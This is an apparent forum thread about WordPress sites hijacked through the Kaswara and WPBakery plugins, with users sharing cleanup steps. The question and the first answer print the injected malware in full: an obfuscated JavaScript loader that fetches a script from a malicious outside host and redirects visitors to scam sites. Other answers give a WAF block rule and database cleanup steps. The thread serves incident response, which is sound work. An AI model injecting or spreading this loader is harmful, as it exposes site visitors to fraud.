Question 166287 in Wordpress Question posted in
The official Wordpress documentation can be found here.

Is there a security vulnerability with WordPress WPBakery and Kaswara?

I have come accross the issue that one of the WordPress websites I provide maintenance for would strangely redirect the user (unprotected by an AdBlocker) to scam websites.

The redirection has been done through stick.travelinskydream.ga.

On a closer check, a script with the following code has been automatically injected into the application. The following code was used:

var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);

It creates a script tag that executes an external JS code which redirects the user to malicious websites when it loads. The resulted script looks like:

<script src="https://stick.travelinskydreams.ga?Brand.js?vid=0000&pidi=191817&id=53646"></script>

From what I’ve seen, thie vulnerability exists within WpBakery and Kaswara plugins and is a known issue.

https://www.wordfence.com/blog/2020/10/episode-90-wpbakery-plugin-vulnerability-exposes-over-4-million-sites/

https://howtofix.guide/fake-jquery-migrate-plugin/

After deactivating and reactivating plugins one by one, the only two culprits remained js_composer (Wp Bakery) and Kaswara. I have tried updating these two plugins, but the "infection" remained, even though patches have been released for this issue.

Tags:

6

Answers


  1. Chosen as BEST ANSWER
    0

    The resolution was simple enough: after hours, inside Wordpress Dashboard, in the Kaswara menu > custom code sections, the very code that has been presented in the question was there. After deleting it, everything returned to normal.

    It is surely not the only way such malware can destroy work, so I am appending this link with other possible effects.

    https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/

    A potential workaround that worked for me was adding this custom script that would remove the malicious JS after it has loaded (temporary solution, does not remove the virus):

    $('script').each(function(index, obj) {
console.log(index, obj);
if (obj.src === 'https://stick.travelinskydream.ga/brand.js&v=0032&sid=236&pid=545747') {
    $(this).remove();
    console.log($(this).text());
}

if ($(this).text() === "var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);") {
    $(this).remove() 
}

    Here is the "beautified" malicious code of the injected JS, maybe it will help someone.

    var _0x3e5356 = _0x567b;

function _0x567b(_0x4f69c6, _0x44f06a) {
    _0x4f69c6 = _0x4f69c6 - 0x161;
    var _0x230d0d = _0x230d[_0x4f69c6];
    return _0x230d0d;
}(function(_0x23c6e3, _0x4b8159) {
    var _0x137209 = _0x567b;
    while (!![]) {
        try {
            var _0x388290 = -parseInt(_0x137209(0x168)) * parseInt(_0x137209(0x16a)) + parseInt(_0x137209(0x16f)) + -parseInt(_0x137209(0x165)) * -parseInt(_0x137209(0x161)) + -parseInt(_0x137209(0x16c)) + parseInt(_0x137209(0x167)) + parseInt(_0x137209(0x16e)) + -parseInt(_0x137209(0x170)) * -parseInt(_0x137209(0x169));
            if (_0x388290 === _0x4b8159) break;
            else _0x23c6e3['push'](_0x23c6e3['shift']());
        } catch (_0x227ada) {
            _0x23c6e3['push'](_0x23c6e3['shift']());
        }
    }
}(_0x230d, 0xb70ce));
var mm = String[_0x3e5356(0x171)](0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x73, 0x74, 0x69, 0x63, 0x6b, 0x2e, 0x74, 0x72, 0x61, 0x76, 0x65, 0x6c, 0x69, 0x6e, 0x73, 0x6b, 0x79, 0x64, 0x72, 0x65, 0x61, 0x6d, 0x2e, 0x67, 0x61, 0x2f, 0x62, 0x72, 0x61, 0x6e, 0x64, 0x2e, 0x6a, 0x73, 0x26, 0x76, 0x3d, 0x30, 0x30, 0x33, 0x32, 0x26, 0x73, 0x69, 0x64, 0x3d, 0x32, 0x33, 0x36, 0x26, 0x70, 0x69, 0x64, 0x3d, 0x35, 0x34, 0x35, 0x37, 0x34, 0x37),
    d = document,
    s = d['createElement'](_0x3e5356(0x163));
s[_0x3e5356(0x16d)] = mm;
document[_0x3e5356(0x16b)] ? document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s, document[_0x3e5356(0x16b)]) : d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);

    If you find anything else or have been affected by this, please share your solutions!


  2. 0

    Just found this option with a BASE64 encoded JS Script. Find and delete it.

    Look for this entrie on you WP_OPTIONS table

    Whats happenning here?

    This malware is a Javascript content witch triggers the GET travelinski stuff brand.js.

    It’s content is encoded in BASE64 to disrupt its detection by SH or Select Query. When invoked into the screen it become a executable snippet.

    It may appear under different an option_name, but the content itself must not change that much.

    Login or Signup to reply.
  3. 0

    So anyone looking for this issue, here is the reason and the solution.

    Reason

    Plugins: WP-Bakery (JS Composer) and Kaswara Plugins are having this issue.

    Solution

    You need to remove one entry from your wp_options table.

    • First login to cPanel.
    • Go to PHPMYADMIN
    • Select the database of your website (which has the issue)
    • Then go to wp_options table.
    • As my friend Andre mentioned the entry could be with different wp_option_name.
    • You need to enter JS in the Filter Rows input field.
    • It will give you results, now look for option_value that starts with: dmFyIF
    • Delete that entry, and you’re all done.
    Login or Signup to reply.
  4. 0

    After you clean your site removing the extrajs in kaswara and perform a full scan with wordfence then:

    For every wordfence freemium users who tries to fix this issue before the 21st May I suggest to:

    In the wordfence-waf.php put these line just one line after the <?php tag:

    if(!empty($_GET['action']) && $_GET['action'] == 'uploadFontIcon'){
   die('Good luck');
}

    Then when you receive the wordfence update on 21st May revert back as the original

    Login or Signup to reply.
  5. 0

    Thank you very much for this. I had my website infected with this and after restoring from backup, only to see if reinfected 2 weeks later. Found the db entry and also saw the script in the custom settings of kaswara. I’ll see how best I can substitute what I used it for and then delete it.

    Any idea how they got in? Is there an htaccess directive I can add to block them?

    I found this report and went digging and found a p.php file uploaded 8 days ago in the kaswara icons folder /uploads/kaswara/icon/slt

    https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5

    Login or Signup to reply.
  6. 0

    After removing the kaswara plugin, go to mysql maybe via phpmyadmin,
    find the wp_options table and delete kasvaracustomjs option_name

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search